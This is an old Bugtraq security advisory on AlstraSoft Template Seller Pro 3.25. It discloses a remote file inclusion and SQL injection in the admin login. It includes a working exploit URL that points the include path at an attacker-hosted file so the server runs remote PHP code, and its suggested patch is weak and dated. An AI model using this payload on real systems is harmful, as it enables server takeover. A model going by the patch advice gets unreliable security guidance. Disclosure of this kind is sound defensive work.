[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Template Seller Pro 3.25
From: r.verton () gmail ! com
Date: 2005-11-15 19:39:01
Message-ID: 20051115193901.15910.qmail () securityfocus ! com
[Download RAW message or body]
AlstraSoft Template Seller Pro 3.25
===================================
Software: AlstraSoft Template Seller Pro 3.25
Severity: Arbitrary code execution, SQL Injection(s)
Risk: High
Author: Robin Verton <r.verton@gmail.com>
Date: Nov. 15 2005
Vendor: www.alstrasoft.com
Description:
Ever thought of starting your very own profitable shopping cart business just like \
TemplateMonster.com? With AlstraSoft Template Seller Pro software, you can run your \
own templates store selling templates such as website templates, logo templates, \
flash intro templates, frontpage templates and many more! The flexibility of \
Template Seller Pro software also allows you to run a membership based templates \
business just like BoxedArt.com by offering paid members multiple templates \
download instantly. [http://www.alstrasoft.com/]
Details:
1) /include/paymentplugins/payment_paypal.php
/**
Paypal payment plugin
*/
global $config,$conn;
include("$config[basepath]/include/payment/class.paypal_ipn.php");
include("$config[basepath]/include/paymentplugins/paymentplugin.php");
If register_globals is set on, we can include and execute any php code of our \
choice. This is very dangerous because if safe_mode is off and there are no \
restriction for execution commands an attacker can get access to each file on the \
server.
http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://youhost.com/our-code.txt?
Because of the trailing '?' we pass the '/include/payment/class.paypal_ipn.php' \
from the include statement as a parameter to the our-code.php script so only the \
script we set in $config[basepath] is included.
2) /admin/index.php
$sql_user_name = $user_name;
$md5_pass = md5($user_pass);
$sql = "SELECT * FROM UserDB WHERE user_name='$sql_user_name' and \
user_password='$md5_pass'";
The User submitted variable for the username is inserted into the database without \
andy validation. Because of this we can insert malicious code into the database.
Nearly NO user-submitted variable is validated , so there are a few more \
SQL-injections possible.
Patch:
Insert constants and use the following code to prevent against such attacks
if( !defined('IN_SYS') ) {
die('Hacking Attempt!');
}
and activate magic_quotes_gpc
Credits:
Credit goes to Robin Verton
References:
[1] http://www.alstrasoft.com/template.htm
[2] http://myblog.it-security23.net
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic